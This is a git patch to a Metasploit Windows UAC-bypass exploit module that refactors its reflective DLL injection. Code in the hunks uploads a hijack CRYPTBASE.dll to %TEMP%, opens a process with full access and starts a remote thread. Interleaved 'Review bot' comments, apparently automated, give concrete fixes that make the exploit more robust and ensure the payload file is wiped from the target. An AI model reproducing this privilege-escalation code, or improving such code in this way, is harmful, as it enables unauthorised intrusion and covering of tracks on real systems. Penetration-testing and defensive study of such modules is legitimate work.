From 6687ef80ee3092f1f4d5dbbaeccd5dce0924e5de Mon Sep 17 00:00:00 2001
From: Meatballs
Date: Tue, 25 Feb 2014 22:03:01 +0000
Subject: [PATCH] Further bypassuac tidies
Dont rescue Exception
Use ReflectiveDLLInjection post mixin
Dont keep retrieving %TEMP% path
---
.../windows/local/bypassuac_injection.rb | 43 +++++--------------
1 file changed, 11 insertions(+), 32 deletions(-)
diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb
index 0c1a0a42ce..af19569349 100644
--- a/modules/exploits/windows/local/bypassuac_injection.rb
+++ b/modules/exploits/windows/local/bypassuac_injection.rb
@@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Local
 include Exploit::EXE
 include Post::File
 include Post::Windows::Priv
+ include Post::Windows::ReflectiveDLLInjection
 def initialize(info={})
 super( update_info( info,
@@ -124,14 +125,13 @@ class Metasploit3 < Msf::Exploit::Local
 check_permissions!
+ @temp_path = expand_path('%TEMP%').strip
+
 upload_payload_dll!
- dll = ''
- File.open(bypass_dll_path, "rb" ) { |f| dll += f.read(f.stat.size) }
- offset = get_reflective_dll_offset(dll)
-
 pid = spawn_inject_proc
- run_injection(pid, offset, dll)
+
+ run_injection(pid, bypass_dll_path)
 # delete the uac bypass payload
 vprint_status("Cleaning up payload file...")
@@ -139,23 +139,8 @@ class Metasploit3 < Msf::Exploit::Local
 end - - def get_reflective_dll_offset(dll) pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) pe.exports.entries.each do |entry| if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) return pe.rva_to_file_offset( entry.rva ) end end raise "Can't find an exported ReflectiveLoader function!" end
-
-
-
- def payload_filepath
- "#{expand_path("%TEMP%").strip}\\CRYPTBASE.dll"
+ def payload_filepath(temp_path)
+ "#{@temp_path}\\CRYPTBASE.dll"
 end
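Review bot: The cleanup under `# delete the uac bypass payload` only runs when `run_injection(pid, bypass_dll_path)` returns normally; if injection raises, or its rescue branch ends in fail_with (that branch is outside this hunk, as is the start of `def exploit`), the CRYPTBASE.dll that upload_payload_dll! just wrote to %TEMP% is left behind on the target. Wrap the call as `begin; run_injection(pid, bypass_dll_path); ensure <the existing cleanup lines>; end` so the file is removed on every path. The new `@temp_path = expand_path('%TEMP%').strip` is also used unchecked: if expansion yields an empty string, or presumably the literal `%TEMP%` when the variable is unset (confirm what expand_path returns on failure), the DLL goes to a bogus path and the error only surfaces at write time. A guard right after the assignment, `fail_with(Exploit::Exception::Unknown, 'Could not resolve %TEMP%') if @temp_path.empty? || @temp_path.include?('%')`, gives a clearer failure.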
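Review bot: `def payload_filepath(temp_path)` declares a required positional parameter that the body never reads, while the call sites visible in this diff pass none (`write_file(payload_filepath, payload)` and the fail_with message in the last hunk), so the upload will raise ArgumentError before anything is written. Drop the parameter: `def payload_filepath` followed by `"#{@temp_path}\\CRYPTBASE.dll"`. The method now also depends on `exploit` having assigned `@temp_path` first; if it is ever called earlier the path degenerates to `\CRYPTBASE.dll`. A memoizing reader such as `def temp_path; @temp_path ||= expand_path('%TEMP%').strip; end`, used from payload_filepath, keeps the single-lookup intent of this commit without the ordering dependency.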
@@ -174,20 +159,14 @@ class Metasploit3 < Msf::Exploit::Local
- def run_injection(pid, offset, dll)
+ def run_injection(pid, dll_path)
 vprint_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}")
 begin
 vprint_status("Opening process #{pid}")
 host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
- vprint_status("Allocating memory in procees #{pid}")
- mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
- # Ensure memory is set for execution
- host_process.memory.protect(mem)
- vprint_status("Allocated memory at address #{"0x%.8x" % mem}, for #{dll.length} bytes")
- vprint_status("Writing the payload into memory")
- host_process.memory.write(mem, dll)
+ exploit_mem, offset = inject_dll_into_process(host_process, dll_path)
 vprint_status("Executing payload")
- thread = host_process.thread.create(mem+offset, 0)
+ thread = host_process.thread.create(exploit_mem + offset, 0)
 print_good("Successfully injected payload in to process: #{pid}")
 client.railgun.kernel32.WaitForSingleObject(thread.handle,3000)
 rescue Rex::Post::Meterpreter::RequestError => e
@@ -219,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Local
 begin
 vprint_status("Payload DLL #{payload.length} bytes long being uploaded..")
 write_file(payload_filepath, payload)
- rescue ::Exception => e
+ rescue Rex::Post::Meterpreter::RequestError => e
 fail_with( Exploit::Exception::Unknown, "Error uploading file #{payload_filepath}: #{e.class} #{e}"
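Review bot: `exploit_mem, offset = inject_dll_into_process(host_process, dll_path)` now runs inside the begin block, but the only rescue is `Rex::Post::Meterpreter::RequestError`; the removed `get_reflective_dll_offset` raised a plain RuntimeError when the DLL exports no ReflectiveLoader, and if the mixin does the same (it is not in view) that error escapes run_injection with the handle from `client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)` still open. The rest of run_injection is outside this hunk; if it does not already release the handle, add `ensure host_process.close if host_process` (the meterpreter Process object presumably exposes close), and either rescue RuntimeError alongside RequestError or make sure the caller treats it as a failure that still triggers payload cleanup. Separately, `print_good("Successfully injected payload in to process: #{pid}")` fires before `WaitForSingleObject(thread.handle,3000)` and that call's return (WAIT_OBJECT_0 versus WAIT_TIMEOUT) is discarded, so a loader that hangs or faults is still reported as success; checking the result before printing would make the module's output honest.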